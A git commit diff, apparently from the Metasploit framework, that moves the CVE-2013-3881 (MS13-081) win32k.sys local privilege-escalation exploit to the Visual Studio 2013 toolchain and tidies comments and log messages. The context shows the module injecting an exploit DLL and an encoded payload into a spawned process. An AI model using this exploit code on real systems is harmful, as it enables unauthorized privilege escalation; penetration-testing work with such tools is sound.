Upgrade toolchain to Visual Studio 2013 v120.
parent
01f41a209c
commit
0ac1acda70
|
@ -3,7 +3,7 @@
|
|||
* Date: February 5, 2014
|
||||
* Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
|
||||
* Exploit Author: Spencer McIntyre
|
||||
* Version: Windows 7 SP1
|
||||
* Version: Windows 7 SP0/SP1
|
||||
* Tested on: Windows 7 SP0/SP1
|
||||
* CVE-2013-3881 MS13-081
|
||||
* References:
|
||||
|
@ -22,7 +22,11 @@
|
|||
#define WIN32_NO_STATUS
|
||||
#include <windows.h>
|
||||
#undef WIN32_NO_STATUS
|
||||
#include <winternl.h>
|
||||
|
||||
#ifndef _NTDEF_
|
||||
typedef __success(return >= 0) LONG NTSTATUS;
|
||||
typedef NTSTATUS *PNTSTATUS;
|
||||
#endif
|
||||
|
||||
#define TABLE_BASE 0xff910000
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
|
@ -20,14 +20,14 @@
|
|||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v90</PlatformToolset>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<PlatformToolset>v90</PlatformToolset>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
|
|
|
@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability in win32k.sys where under
|
||||
specific conditions TrackPopupMenuEx will pass a NULL pointer to
|
||||
the EndMenuState. This module has been tested successfully on
|
||||
Windows 7 SP0 and Windows 7 SP1.
|
||||
the MNEndMenuState procedure. This module has been tested
|
||||
successfully on Windows 7 SP0 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -102,15 +102,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.getpid}...")
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||
"cve-2013-3881", "cve-2013-3881.x86.dll")
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.getpid} ...")
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.getpid}...")
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
|
|
Loading…
Reference in New Issue